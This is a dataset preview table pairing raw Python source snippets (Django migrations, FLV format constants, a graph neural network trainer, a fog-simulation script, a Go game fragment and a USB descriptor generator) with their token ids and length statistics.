Dataset preview columns (type and per-row min/max):

Column            Type     Min  Max
content           string   1    1.05M   (character length)
input_ids         list     1    883k    (list length)
ratio_char_token  float64  1    22.9
token_count       int64    1    883k
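Each row pairs a raw source-code string (content) with its token ids and two derived statistics: token_count is the number of tokens, and ratio_char_token is characters per token. Below is a minimal sketch of how such a row could be built. It assumes the ids come from the GPT-2 BPE tokenizer (visible ids such as 198 for a newline and 11748 for "import" are consistent with that vocabulary, but the exact tokenizer is an assumption), and make_row is a hypothetical helper, not part of any dataset tooling.

```python
# Minimal sketch: build one row (content, input_ids, ratio_char_token, token_count).
# Assumption: GPT-2 BPE tokenizer; make_row is a hypothetical helper.
from transformers import GPT2TokenizerFast

tokenizer = GPT2TokenizerFast.from_pretrained("gpt2")

def make_row(content: str) -> dict:
    """Tokenize a source file and attach the two derived statistics."""
    input_ids = tokenizer(content)["input_ids"]
    token_count = len(input_ids)
    return {
        "content": content,
        "input_ids": input_ids,
        "ratio_char_token": len(content) / token_count,  # characters per token
        "token_count": token_count,
    }

# Example with a short snippet (whitespace chosen for illustration only).
row = make_row("import xmlrpc.client\n\n\nif __name__ == '__main__':\n    main()\n")
print(row["token_count"], round(row["ratio_char_token"], 6))
```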
import xmlrpc.client if __name__ == '__main__': main()
[ 11748, 35555, 81, 14751, 13, 16366, 628, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 1388, 3419, 198 ]
2.384615
26
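The preview flattens newlines inside content, so a row's original formatting is easiest to inspect by decoding its input_ids. A minimal sketch for the first row above, under the same GPT-2 tokenizer assumption:

```python
# Minimal sketch (same GPT-2 assumption as above): decode the first row's input_ids
# to recover the snippet with its original newlines and indentation.
from transformers import GPT2TokenizerFast

tokenizer = GPT2TokenizerFast.from_pretrained("gpt2")

# input_ids copied verbatim from the first preview row.
input_ids = [11748, 35555, 81, 14751, 13, 16366, 628, 198, 198, 361, 11593, 3672, 834,
             6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 1388, 3419, 198]

print(tokenizer.decode(input_ids))
```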
# Generated by Django 3.0.7 on 2020-07-27 19:23 import build.models from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 513, 13, 15, 13, 22, 319, 12131, 12, 2998, 12, 1983, 678, 25, 1954, 198, 198, 11748, 1382, 13, 27530, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
3
37
import argparse import os import torch import yaml DEFAULT_DEVICE = 'cuda:0'
[ 11748, 1822, 29572, 198, 198, 11748, 28686, 198, 11748, 28034, 198, 11748, 331, 43695, 198, 198, 7206, 38865, 62, 7206, 27389, 796, 705, 66, 15339, 25, 15, 6, 628, 198 ]
2.7
30
from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion.simplify_nonsense_channel_mode_conversion import \ SimplifyNonsenseChannelModeConversion from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion.simplify_redundant_channel_mode_conversion import \ SimplifyRedundantChannelModeConversion from webdnn.graph.optimize_rule import OptimizeRuleGroup
[ 6738, 3992, 67, 20471, 13, 1891, 437, 13, 12384, 4743, 13, 40085, 1096, 62, 38785, 13, 14323, 489, 1958, 62, 17620, 62, 14171, 62, 1102, 9641, 13, 14323, 489, 1958, 62, 77, 46563, 62, 17620, 62, 14171, 62, 1102, 9641, 1330, 3467, 19...
3.054264
129
""" The constants used in FLV files and their meanings. """ # Tag type (TAG_TYPE_AUDIO, TAG_TYPE_VIDEO, TAG_TYPE_SCRIPT) = (8, 9, 18) # Sound format (SOUND_FORMAT_PCM_PLATFORM_ENDIAN, SOUND_FORMAT_ADPCM, SOUND_FORMAT_MP3, SOUND_FORMAT_PCM_LITTLE_ENDIAN, SOUND_FORMAT_NELLYMOSER_16KHZ, SOUND_FORMAT_NELLYMOSER_8KHZ, SOUND_FORMAT_NELLYMOSER, SOUND_FORMAT_G711_A_LAW, SOUND_FORMAT_G711_MU_LAW) = range(9) (SOUND_FORMAT_AAC, SOUND_FORMAT_SPEEX) = range(10, 12) (SOUND_FORMAT_MP3_8KHZ, SOUND_FORMAT_DEVICE_SPECIFIC) = range(14, 16) sound_format_to_string = { SOUND_FORMAT_PCM_PLATFORM_ENDIAN: "Linear PCM, platform endian", SOUND_FORMAT_ADPCM: "ADPCM", SOUND_FORMAT_MP3: "MP3", SOUND_FORMAT_PCM_LITTLE_ENDIAN: "Linear PCM, little endian", SOUND_FORMAT_NELLYMOSER_16KHZ: "Nellymoser 16-kHz mono", SOUND_FORMAT_NELLYMOSER_8KHZ: "Nellymoser 8-kHz mono", SOUND_FORMAT_NELLYMOSER: "Nellymoser", SOUND_FORMAT_G711_A_LAW: "G.711 A-law logarithmic PCM", SOUND_FORMAT_G711_MU_LAW: "G.711 mu-law logarithmic PCM", SOUND_FORMAT_AAC: "AAC", SOUND_FORMAT_SPEEX: "Speex", SOUND_FORMAT_MP3_8KHZ: "MP3 8-kHz", SOUND_FORMAT_DEVICE_SPECIFIC: "Device-specific sound" } # Sound rate (SOUND_RATE_5_5_KHZ, SOUND_RATE_11_KHZ, SOUND_RATE_22_KHZ, SOUND_RATE_44_KHZ) = range(4) sound_rate_to_string = { SOUND_RATE_5_5_KHZ: "5.5-kHz", SOUND_RATE_11_KHZ: "11-kHz", SOUND_RATE_22_KHZ: "22-kHz", SOUND_RATE_44_KHZ: "44-kHz" } # Sound size (SOUND_SIZE_8_BIT, SOUND_SIZE_16_BIT) = range(2) sound_size_to_string = { SOUND_SIZE_8_BIT: "snd8Bit", SOUND_SIZE_16_BIT: "snd16Bit" } # Sound type (SOUND_TYPE_MONO, SOUND_TYPE_STEREO) = range(2) sound_type_to_string = { SOUND_TYPE_MONO: "sndMono", SOUND_TYPE_STEREO: "sndStereo" } # AAC packet type (AAC_PACKET_TYPE_SEQUENCE_HEADER, AAC_PACKET_TYPE_RAW) = range(2) aac_packet_type_to_string = { AAC_PACKET_TYPE_SEQUENCE_HEADER: "sequence header", AAC_PACKET_TYPE_RAW: "raw" } # Codec ID (CODEC_ID_JPEG, CODEC_ID_H263, CODEC_ID_SCREEN_VIDEO, CODEC_ID_VP6, CODEC_ID_VP6_WITH_ALPHA, CODEC_ID_SCREEN_VIDEO_V2, CODEC_ID_H264) = range(1, 8) codec_id_to_string = { CODEC_ID_JPEG: "JPEG", CODEC_ID_H263: "Sorenson H.263", CODEC_ID_SCREEN_VIDEO: "Screen video", CODEC_ID_VP6: "On2 VP6", CODEC_ID_VP6_WITH_ALPHA: "On2 VP6 with alpha channel", CODEC_ID_SCREEN_VIDEO_V2: "Screen video version 2", CODEC_ID_H264: "H.264" } # Frame type (FRAME_TYPE_KEYFRAME, FRAME_TYPE_INTERFRAME, FRAME_TYPE_DISPOSABLE_INTERFRAME, FRAME_TYPE_GENERATED_KEYFRAME, FRAME_TYPE_INFO_FRAME) = range(1, 6) frame_type_to_string = { FRAME_TYPE_KEYFRAME: "keyframe", FRAME_TYPE_INTERFRAME: "interframe", FRAME_TYPE_DISPOSABLE_INTERFRAME: "disposable interframe", FRAME_TYPE_GENERATED_KEYFRAME: "generated keyframe", FRAME_TYPE_INFO_FRAME: "video info/command frame" } # H.264 packet type (H264_PACKET_TYPE_SEQUENCE_HEADER, H264_PACKET_TYPE_NALU, H264_PACKET_TYPE_END_OF_SEQUENCE) = range(3) h264_packet_type_to_string = { H264_PACKET_TYPE_SEQUENCE_HEADER: "sequence header", H264_PACKET_TYPE_NALU: "NAL unit", H264_PACKET_TYPE_END_OF_SEQUENCE: "sequence end" } # Value type (VALUE_TYPE_NUMBER, VALUE_TYPE_BOOLEAN, VALUE_TYPE_STRING, VALUE_TYPE_OBJECT, VALUE_TYPE_MOVIECLIP, VALUE_TYPE_NULL, VALUE_TYPE_UNDEFINED, VALUE_TYPE_REFERENCE, VALUE_TYPE_ECMA_ARRAY) = range(9) (VALUE_TYPE_STRICT_ARRAY, VALUE_TYPE_DATE, VALUE_TYPE_LONGSTRING) = range(10, 13) value_type_to_string = { VALUE_TYPE_NUMBER: 'Number', VALUE_TYPE_BOOLEAN: 'Boolean', VALUE_TYPE_STRING: 'String', VALUE_TYPE_OBJECT: 'Object', VALUE_TYPE_MOVIECLIP: 'MovieClip', VALUE_TYPE_NULL: 'Null', VALUE_TYPE_UNDEFINED: 'Undefined', 
VALUE_TYPE_REFERENCE: 'Reference', VALUE_TYPE_ECMA_ARRAY: 'ECMA Array', VALUE_TYPE_STRICT_ARRAY: 'Strict Array', VALUE_TYPE_DATE: 'Date', VALUE_TYPE_LONGSTRING: 'Longstring' }
[ 37811, 198, 464, 38491, 973, 287, 9977, 53, 3696, 290, 511, 26368, 13, 198, 37811, 198, 198, 2, 17467, 2099, 198, 7, 42197, 62, 25216, 62, 48877, 9399, 11, 37801, 62, 25216, 62, 42937, 11, 37801, 62, 25216, 62, 6173, 46023, 8, 796, ...
2.005015
1,994
from nltk.corpus import semcor # if __name__ == "__main__": # s = semcor.tagged_sents(tag='sem')[0] # for chunk in s: # a = semcor_chunk(chunk) # print a.get_syn_set() # for chunk in s: # a = semcor_chunk(chunk) # print a.get_words()
[ 6738, 299, 2528, 74, 13, 10215, 79, 385, 1330, 5026, 10215, 198, 198, 2, 611, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 2, 220, 197, 82, 796, 5026, 10215, 13, 12985, 2004, 62, 82, 658, 7, 12985, 11639, 43616, 11537, ...
1.97619
126
import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers from load_cora import load_cora from baseline_model import create_ffn from utils import run_experiment from utils import display_learning_curves # Graph convolution layer if __name__ == '__main__': papers, train_data, test_data, paper_idx, class_idx, citations, feature_names = load_cora(verbose=1) num_features = len(feature_names) num_classes = len(class_idx) hidden_units = [32, 32] learning_rate = 0.01 dropout_rate = 0.5 epochs = 300 batch_size = 256 # Create an edges array (sparse adjacency matrix) of shape [2, num_edges] edges = citations[["source", "target"]].to_numpy().T #print(edges) # Create an edge weights array of ones (default weights) edge_weights = tf.ones(shape=edges.shape[1]) # Create a node features array of shape [num_nodes, num_features] node_features = tf.cast( papers.sort_values("paper_id")[feature_names].to_numpy(), dtype=tf.float32) # Create graph info tuple with node_features, edges, and edge_weights graph_info = (node_features, edges, edge_weights) print("Edges shape: ", edges.shape) print("Nodes shape: ", node_features.shape) gnn_model = GNNNodeClassifier( graph_info=graph_info, num_classes=num_classes, hidden_units=hidden_units, dropout_rate=dropout_rate, name="gnn_model" ) print("GNN output shape: ", gnn_model([1, 10, 100])) gnn_model.summary() # Train the GNN model X_train = train_data.paper_id.to_numpy() y_train = train_data.subject history = run_experiment(gnn_model, X_train, y_train, batch_size, epochs, learning_rate) # Plot the learning curves display_learning_curves(history, figure_name="gnn.png") # Evaluate on test data X_test = test_data.paper_id.to_numpy() y_test = test_data.subject _, test_accuracy = gnn_model.evaluate(x=X_test, y=y_test, verbose=1) print(f"Test accuracy: {round(test_accuracy * 100, 2)}%")
[ 11748, 11192, 273, 11125, 355, 48700, 198, 6738, 11192, 273, 11125, 1330, 41927, 292, 198, 6738, 11192, 273, 11125, 13, 6122, 292, 1330, 11685, 198, 6738, 3440, 62, 66, 5799, 1330, 3440, 62, 66, 5799, 198, 6738, 14805, 62, 19849, 1330, ...
2.772346
716
"""Discover Samsung Smart TV services.""" from . import SSDPDiscoverable from ..const import ATTR_NAME # For some models, Samsung forces a [TV] prefix to the user-specified name. FORCED_NAME_PREFIX = '[TV]'
[ 37811, 44596, 10397, 10880, 3195, 2594, 526, 15931, 198, 6738, 764, 1330, 21252, 5760, 29392, 540, 198, 6738, 11485, 9979, 1330, 5161, 5446, 62, 20608, 198, 198, 2, 1114, 617, 4981, 11, 10397, 3386, 257, 685, 6849, 60, 21231, 284, 262, ...
3.42623
61
"""Package for reverse-engineering.""" from .rpa import *
[ 37811, 27813, 329, 9575, 12, 40321, 526, 15931, 198, 198, 6738, 764, 81, 8957, 1330, 1635, 198 ]
3.470588
17
# Generated by Django 3.2.5 on 2021-12-21 19:42 from django.db import migrations
[ 2, 2980, 515, 416, 37770, 513, 13, 17, 13, 20, 319, 33448, 12, 1065, 12, 2481, 678, 25, 3682, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 628 ]
2.766667
30
""" This is the most simple scenario with a basic topology, some users and a set of apps with only one service. @author: Isaac Lera """ import os import time import json import random import logging.config import networkx as nx import numpy as np from pathlib import Path from yafs.core import Sim from yafs.application import create_applications_from_json from yafs.topology import Topology from yafs.placement import JSONPlacement from yafs.path_routing import DeviceSpeedAwareRouting from yafs.distribution import deterministic_distribution from yafs.stats import Stats RANDOM_SEED = 1 if __name__ == '__main__': logging.config.fileConfig(os.getcwd() + '/logging.ini') nIterations = 1 # iteration for each experiment simulationDuration = 1000 # Iteration for each experiment changing the seed of randoms for iteration in range(nIterations): random.seed(iteration) logging.info("Running experiment it: - %i" % iteration) start_time = time.time() main(stop_time=simulationDuration, it=iteration) print("\n--- %s seconds ---" % (time.time() - start_time)) print("Simulation Done!") m = Stats(defaultPath="results/sim_trace") # print ("\tNetwork bytes transmitted:") # print (f"\t\t{m.bytes_transmitted():.1f}") # m.df_link.head(15) # from Stats class time_loops = [["M.USER.APP.0", "M.USER.APP.1", "M.USER.APP.2", "M.USER.APP.3"]] m.showResults2(10000, time_loops=time_loops) m.compute_times_df() print ("\t- Network saturation -") print() print ("\t\tAverage waiting messages : " f"{m.average_messages_not_transmitted()}") print() print ("\t\tPeak of waiting messages :" f"{m.peak_messages_not_transmitted()}") print() print(f"\t\tShow Loops: {m.showLoops(time_loops)}") print() print (f"\t\tTOTAL messages not transmitted:" f" {m.messages_not_transmitted()}") print() #print(m.df.head()) #print(m.df['time_latency']) #print(m.df_link.head()) print(m.get_df_modules())
[ 37811, 198, 220, 220, 220, 770, 318, 262, 749, 2829, 8883, 351, 257, 4096, 1353, 1435, 11, 617, 2985, 290, 257, 900, 286, 6725, 351, 691, 530, 2139, 13, 628, 220, 220, 220, 2488, 9800, 25, 19068, 406, 8607, 198, 37811, 198, 11748, ...
2.408435
901
from db import db # class RisklayerPrognosisSchema(SQLAlchemyAutoSchema): # class Meta: # strict = True # model = RisklayerPrognosis # # timestamp = fields.Timestamp(data_key="datenbestand") # prognosis = fields.Number(data_key="prognosis")
[ 6738, 20613, 1330, 20613, 628, 198, 2, 1398, 19602, 29289, 2964, 4593, 5958, 27054, 2611, 7, 17861, 2348, 26599, 27722, 27054, 2611, 2599, 198, 2, 220, 220, 220, 220, 1398, 30277, 25, 198, 2, 220, 220, 220, 220, 220, 220, 220, 220, ...
2.567308
104
import os import unittest os.environ['DJANGO_SETTINGS_MODULE'] = 'settings' import django if django.VERSION >= (1, 7): django.setup() from django import forms from django.db import models from django.forms.forms import NON_FIELD_ERRORS from django_secureform.forms import SecureForm if __name__ == '__main__': unittest.main()
[ 11748, 28686, 198, 11748, 555, 715, 395, 198, 418, 13, 268, 2268, 17816, 35028, 1565, 11230, 62, 28480, 51, 20754, 62, 33365, 24212, 20520, 796, 705, 33692, 6, 198, 198, 11748, 42625, 14208, 198, 361, 42625, 14208, 13, 43717, 18189, 357...
2.819672
122
import cv2 as cv import numpy as np cap = cv.VideoCapture(1) print(cap.get(cv.CAP_PROP_FRAME_WIDTH)) print(cap.get(cv.CAP_PROP_FRAME_HEIGHT)) cap.set(3,3000) cap.set(4,3000) print(cap.get(cv.CAP_PROP_FRAME_WIDTH)) print(cap.get(cv.CAP_PROP_FRAME_HEIGHT)) while (cap.isOpened()): ret , frame = cap.read() if (ret == True): cv.imshow("camVid", frame) if cv.waitKey(25) & 0xFF == ord('q'): break else: break cap.release() cv.destroyAllWindows()
[ 11748, 269, 85, 17, 355, 269, 85, 198, 11748, 299, 32152, 355, 45941, 198, 198, 11128, 796, 269, 85, 13, 10798, 49630, 7, 16, 8, 198, 198, 4798, 7, 11128, 13, 1136, 7, 33967, 13, 33177, 62, 4805, 3185, 62, 10913, 10067, 62, 54, ...
1.995968
248
# from pypy-benchmarks/own/chaos.py, with some minor modifications # (more output, took out the benchmark harness) # import random, math, sys, time SIZE = 9 GAMES = 200 KOMI = 7.5 EMPTY, WHITE, BLACK = 0, 1, 2 SHOW = {EMPTY: '.', WHITE: 'o', BLACK: 'x'} PASS = -1 MAXMOVES = SIZE*SIZE*3 TIMESTAMP = 0 MOVES = 0 def user_move(board): while True: text = raw_input('?').strip() if text == 'p': return PASS if text == 'q': raise EOFError try: x, y = [int(i) for i in text.split()] except ValueError: continue if not (0 <= x < SIZE and 0 <= y < SIZE): continue pos = to_pos(x, y) if board.useful(pos): return pos if __name__ == "__main__": main(100)
[ 2, 422, 279, 4464, 88, 12, 26968, 14306, 14, 593, 14, 354, 7495, 13, 9078, 11, 351, 617, 4159, 19008, 198, 2, 357, 3549, 5072, 11, 1718, 503, 262, 18335, 19356, 8, 198, 2, 198, 198, 11748, 4738, 11, 10688, 11, 25064, 11, 640, 19...
2.030691
391
# SPDX-FileCopyrightText: 2014 MicroPython & CircuitPython contributors (https://github.com/adafruit/circuitpython/graphs/contributors) # # SPDX-License-Identifier: MIT import argparse import os import sys sys.path.append("../../tools/usb_descriptor") from adafruit_usb_descriptor import audio, audio10, cdc, hid, midi, msc, standard, util import hid_report_descriptors DEFAULT_INTERFACE_NAME = 'CircuitPython' ALL_DEVICES='CDC,MSC,AUDIO,HID' ALL_DEVICES_SET=frozenset(ALL_DEVICES.split(',')) DEFAULT_DEVICES='CDC,MSC,AUDIO,HID' ALL_HID_DEVICES='KEYBOARD,MOUSE,CONSUMER,SYS_CONTROL,GAMEPAD,DIGITIZER,XAC_COMPATIBLE_GAMEPAD,RAW' ALL_HID_DEVICES_SET=frozenset(ALL_HID_DEVICES.split(',')) # Digitizer works on Linux but conflicts with mouse, so omit it. DEFAULT_HID_DEVICES='KEYBOARD,MOUSE,CONSUMER,GAMEPAD' parser = argparse.ArgumentParser(description='Generate USB descriptors.') parser.add_argument('--highspeed', default=False, action='store_true', help='descriptor for highspeed device') parser.add_argument('--manufacturer', type=str, help='manufacturer of the device') parser.add_argument('--product', type=str, help='product name of the device') parser.add_argument('--vid', type=lambda x: int(x, 16), help='vendor id') parser.add_argument('--pid', type=lambda x: int(x, 16), help='product id') parser.add_argument('--serial_number_length', type=int, default=32, help='length needed for the serial number in digits') parser.add_argument('--devices', type=lambda l: tuple(l.split(',')), default=DEFAULT_DEVICES, help='devices to include in descriptor (AUDIO includes MIDI support)') parser.add_argument('--hid_devices', type=lambda l: tuple(l.split(',')), default=DEFAULT_HID_DEVICES, help='HID devices to include in HID report descriptor') parser.add_argument('--interface_name', type=str, help='The name/prefix to use in the interface descriptions', default=DEFAULT_INTERFACE_NAME) parser.add_argument('--no-renumber_endpoints', dest='renumber_endpoints', action='store_false', help='use to not renumber endpoint') parser.add_argument('--cdc_ep_num_notification', type=int, default=0, help='endpoint number of CDC NOTIFICATION') parser.add_argument('--cdc_ep_num_data_out', type=int, default=0, help='endpoint number of CDC DATA OUT') parser.add_argument('--cdc_ep_num_data_in', type=int, default=0, help='endpoint number of CDC DATA IN') parser.add_argument('--msc_ep_num_out', type=int, default=0, help='endpoint number of MSC OUT') parser.add_argument('--msc_ep_num_in', type=int, default=0, help='endpoint number of MSC IN') parser.add_argument('--hid_ep_num_out', type=int, default=0, help='endpoint number of HID OUT') parser.add_argument('--hid_ep_num_in', type=int, default=0, help='endpoint number of HID IN') parser.add_argument('--midi_ep_num_out', type=int, default=0, help='endpoint number of MIDI OUT') parser.add_argument('--midi_ep_num_in', type=int, default=0, help='endpoint number of MIDI IN') parser.add_argument('--output_c_file', type=argparse.FileType('w', encoding='UTF-8'), required=True) parser.add_argument('--output_h_file', type=argparse.FileType('w', encoding='UTF-8'), required=True) args = parser.parse_args() unknown_devices = list(frozenset(args.devices) - ALL_DEVICES_SET) if unknown_devices: raise ValueError("Unknown device(s)", unknown_devices) unknown_hid_devices = list(frozenset(args.hid_devices) - ALL_HID_DEVICES_SET) if unknown_hid_devices: raise ValueError("Unknown HID devices(s)", unknown_hid_devices) if not args.renumber_endpoints: if 'CDC' in args.devices: if args.cdc_ep_num_notification == 0: 
raise ValueError("CDC notification endpoint number must not be 0") elif args.cdc_ep_num_data_out == 0: raise ValueError("CDC data OUT endpoint number must not be 0") elif args.cdc_ep_num_data_in == 0: raise ValueError("CDC data IN endpoint number must not be 0") if 'MSC' in args.devices: if args.msc_ep_num_out == 0: raise ValueError("MSC endpoint OUT number must not be 0") elif args.msc_ep_num_in == 0: raise ValueError("MSC endpoint IN number must not be 0") if 'HID' in args.devices: if args.args.hid_ep_num_out == 0: raise ValueError("HID endpoint OUT number must not be 0") elif args.hid_ep_num_in == 0: raise ValueError("HID endpoint IN number must not be 0") if 'AUDIO' in args.devices: if args.args.midi_ep_num_out == 0: raise ValueError("MIDI endpoint OUT number must not be 0") elif args.midi_ep_num_in == 0: raise ValueError("MIDI endpoint IN number must not be 0") # langid must be the 0th string descriptor LANGID_INDEX = StringIndex.index("\u0409", variable_name="language_id") assert LANGID_INDEX == 0 SERIAL_NUMBER_INDEX = StringIndex.index("S" * args.serial_number_length, variable_name="usb_serial_number") device = standard.DeviceDescriptor( description="top", idVendor=args.vid, idProduct=args.pid, iManufacturer=StringIndex.index(args.manufacturer), iProduct=StringIndex.index(args.product), iSerialNumber=SERIAL_NUMBER_INDEX) # Interface numbers are interface-set local and endpoints are interface local # until util.join_interfaces renumbers them. cdc_union = cdc.Union( description="CDC comm", bMasterInterface=0x00, # Adjust this after interfaces are renumbered. bSlaveInterface_list=[0x01]) # Adjust this after interfaces are renumbered. cdc_call_management = cdc.CallManagement( description="CDC comm", bmCapabilities=0x01, bDataInterface=0x01) # Adjust this after interfaces are renumbered. 
cdc_comm_interface = standard.InterfaceDescriptor( description="CDC comm", bInterfaceClass=cdc.CDC_CLASS_COMM, # Communications Device Class bInterfaceSubClass=cdc.CDC_SUBCLASS_ACM, # Abstract control model bInterfaceProtocol=cdc.CDC_PROTOCOL_NONE, iInterface=StringIndex.index("{} CDC control".format(args.interface_name)), subdescriptors=[ cdc.Header( description="CDC comm", bcdCDC=0x0110), cdc_call_management, cdc.AbstractControlManagement( description="CDC comm", bmCapabilities=0x02), cdc_union, standard.EndpointDescriptor( description="CDC comm in", bEndpointAddress=args.cdc_ep_num_notification | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_INTERRUPT, wMaxPacketSize=0x0040, bInterval=0x10) ]) cdc_data_interface = standard.InterfaceDescriptor( description="CDC data", bInterfaceClass=cdc.CDC_CLASS_DATA, iInterface=StringIndex.index("{} CDC data".format(args.interface_name)), subdescriptors=[ standard.EndpointDescriptor( description="CDC data out", bEndpointAddress=args.cdc_ep_num_data_out | standard.EndpointDescriptor.DIRECTION_OUT, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), standard.EndpointDescriptor( description="CDC data in", bEndpointAddress=args.cdc_ep_num_data_in | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), ]) cdc_interfaces = [cdc_comm_interface, cdc_data_interface] msc_interfaces = [ standard.InterfaceDescriptor( description="MSC", bInterfaceClass=msc.MSC_CLASS, bInterfaceSubClass=msc.MSC_SUBCLASS_TRANSPARENT, bInterfaceProtocol=msc.MSC_PROTOCOL_BULK, iInterface=StringIndex.index("{} Mass Storage".format(args.interface_name)), subdescriptors=[ standard.EndpointDescriptor( description="MSC in", bEndpointAddress=args.msc_ep_num_in | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), standard.EndpointDescriptor( description="MSC out", bEndpointAddress=(args.msc_ep_num_out | standard.EndpointDescriptor.DIRECTION_OUT), bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), ] ) ] # When there's only one hid_device, it shouldn't have a report id. # Otherwise, report ids are assigned sequentially: # args.hid_devices[0] has report_id 1 # args.hid_devices[1] has report_id 2 # etc. report_ids = {} if len(args.hid_devices) == 1: name = args.hid_devices[0] combined_hid_report_descriptor = hid.ReportDescriptor( description=name, report_descriptor=bytes(hid_report_descriptors.REPORT_DESCRIPTOR_FUNCTIONS[name](0))) report_ids[name] = 0 else: report_id = 1 concatenated_descriptors = bytearray() for name in args.hid_devices: concatenated_descriptors.extend( bytes(hid_report_descriptors.REPORT_DESCRIPTOR_FUNCTIONS[name](report_id))) report_ids[name] = report_id report_id += 1 combined_hid_report_descriptor = hid.ReportDescriptor( description="MULTIDEVICE", report_descriptor=bytes(concatenated_descriptors)) # ASF4 expects keyboard and generic devices to have both in and out endpoints, # and will fail (possibly silently) if both are not supplied. 
hid_endpoint_in_descriptor = standard.EndpointDescriptor( description="HID in", bEndpointAddress=args.hid_ep_num_in | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_INTERRUPT, bInterval=8) hid_endpoint_out_descriptor = standard.EndpointDescriptor( description="HID out", bEndpointAddress=args.hid_ep_num_out | standard.EndpointDescriptor.DIRECTION_OUT, bmAttributes=standard.EndpointDescriptor.TYPE_INTERRUPT, bInterval=8) hid_interfaces = [ standard.InterfaceDescriptor( description="HID Multiple Devices", bInterfaceClass=hid.HID_CLASS, bInterfaceSubClass=hid.HID_SUBCLASS_NOBOOT, bInterfaceProtocol=hid.HID_PROTOCOL_NONE, iInterface=StringIndex.index("{} HID".format(args.interface_name)), subdescriptors=[ hid.HIDDescriptor( description="HID", wDescriptorLength=len(bytes(combined_hid_report_descriptor))), hid_endpoint_in_descriptor, hid_endpoint_out_descriptor, ] ), ] # Audio! # In and out here are relative to CircuitPython # USB OUT -> midi_in_jack_emb -> midi_out_jack_ext -> CircuitPython midi_in_jack_emb = midi.InJackDescriptor( description="MIDI PC -> {}".format(args.interface_name), bJackType=midi.JACK_TYPE_EMBEDDED, iJack=StringIndex.index("{} usb_midi.ports[0]".format(args.interface_name))) midi_out_jack_ext = midi.OutJackDescriptor( description="MIDI data out to user code.", bJackType=midi.JACK_TYPE_EXTERNAL, input_pins=[(midi_in_jack_emb, 1)], iJack=0) # USB IN <- midi_out_jack_emb <- midi_in_jack_ext <- CircuitPython midi_in_jack_ext = midi.InJackDescriptor( description="MIDI data in from user code.", bJackType=midi.JACK_TYPE_EXTERNAL, iJack=0) midi_out_jack_emb = midi.OutJackDescriptor( description="MIDI PC <- {}".format(args.interface_name), bJackType=midi.JACK_TYPE_EMBEDDED, input_pins=[(midi_in_jack_ext, 1)], iJack=StringIndex.index("{} usb_midi.ports[1]".format(args.interface_name))) audio_midi_interface = standard.InterfaceDescriptor( description="Midi goodness", bInterfaceClass=audio.AUDIO_CLASS_DEVICE, bInterfaceSubClass=audio.AUDIO_SUBCLASS_MIDI_STREAMING, bInterfaceProtocol=audio.AUDIO_PROTOCOL_V1, iInterface=StringIndex.index("{} MIDI".format(args.interface_name)), subdescriptors=[ midi.Header( jacks_and_elements=[ midi_in_jack_emb, midi_in_jack_ext, midi_out_jack_emb, midi_out_jack_ext ], ), standard.EndpointDescriptor( description="MIDI data out to {}".format(args.interface_name), bEndpointAddress=args.midi_ep_num_out | standard.EndpointDescriptor.DIRECTION_OUT, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), midi.DataEndpointDescriptor(baAssocJack=[midi_in_jack_emb]), standard.EndpointDescriptor( description="MIDI data in from {}".format(args.interface_name), bEndpointAddress=args.midi_ep_num_in | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval = 0x0, wMaxPacketSize=512 if args.highspeed else 64), midi.DataEndpointDescriptor(baAssocJack=[midi_out_jack_emb]), ]) cs_ac_interface = audio10.AudioControlInterface( description="Empty audio control", audio_streaming_interfaces = [], midi_streaming_interfaces = [ audio_midi_interface ] ) audio_control_interface = standard.InterfaceDescriptor( description="All the audio", bInterfaceClass=audio.AUDIO_CLASS_DEVICE, bInterfaceSubClass=audio.AUDIO_SUBCLASS_CONTROL, bInterfaceProtocol=audio.AUDIO_PROTOCOL_V1, iInterface=StringIndex.index("{} Audio".format(args.interface_name)), subdescriptors=[ cs_ac_interface, ]) # Audio streaming interfaces must occur before MIDI ones. 
audio_interfaces = [audio_control_interface] + cs_ac_interface.audio_streaming_interfaces + cs_ac_interface.midi_streaming_interfaces interfaces_to_join = [] if 'CDC' in args.devices: interfaces_to_join.append(cdc_interfaces) if 'MSC' in args.devices: interfaces_to_join.append(msc_interfaces) if 'HID' in args.devices: interfaces_to_join.append(hid_interfaces) if 'AUDIO' in args.devices: interfaces_to_join.append(audio_interfaces) # util.join_interfaces() will renumber the endpoints to make them unique across descriptors, # and renumber the interfaces in order. But we still need to fix up certain # interface cross-references. interfaces = util.join_interfaces(interfaces_to_join, renumber_endpoints=args.renumber_endpoints) # Now adjust the CDC interface cross-references. cdc_union.bMasterInterface = cdc_comm_interface.bInterfaceNumber cdc_union.bSlaveInterface_list = [cdc_data_interface.bInterfaceNumber] cdc_call_management.bDataInterface = cdc_data_interface.bInterfaceNumber cdc_iad = standard.InterfaceAssociationDescriptor( description="CDC IAD", bFirstInterface=cdc_comm_interface.bInterfaceNumber, bInterfaceCount=len(cdc_interfaces), bFunctionClass=cdc.CDC_CLASS_COMM, # Communications Device Class bFunctionSubClass=cdc.CDC_SUBCLASS_ACM, # Abstract control model bFunctionProtocol=cdc.CDC_PROTOCOL_NONE) descriptor_list = [] if 'CDC' in 